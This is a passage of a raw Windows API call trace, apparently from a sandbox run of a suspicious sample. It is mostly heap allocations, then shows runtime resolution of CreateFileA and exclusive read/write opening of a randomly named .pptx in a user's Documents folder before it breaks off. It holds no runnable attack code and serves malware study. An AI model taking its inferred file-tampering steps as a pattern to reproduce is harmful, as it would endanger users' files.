[0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.430] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0036.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.433] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.433] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.434] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.435] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc28 [0036.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.436] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0036.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cc28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.436] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0036.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", lpUsedDefaultChar=0x0) returned 69 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.437] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\szlym.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8a) returned 0x7c3818 [0036.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=69, lpWideCharStr=0x7c3818, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx") returned 69 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.438] 